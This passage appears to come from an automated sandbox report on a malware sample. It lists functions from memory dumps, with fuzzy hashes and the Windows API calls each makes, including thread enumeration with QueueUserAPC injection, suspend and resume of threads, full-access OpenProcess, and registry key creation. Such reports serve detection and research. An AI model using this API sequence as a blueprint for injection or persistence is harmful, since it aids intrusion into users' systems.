    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
